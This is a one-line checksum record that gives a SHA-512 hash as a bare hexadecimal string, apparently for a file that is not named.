SHA51245a4652d229491c936b0fd5839b335ae924d5b7ee5b05925ebb2f0bb8ca030fca9544ecf4050089b04195e877fcdae4657cd29621299e053398093ee4e5fadb7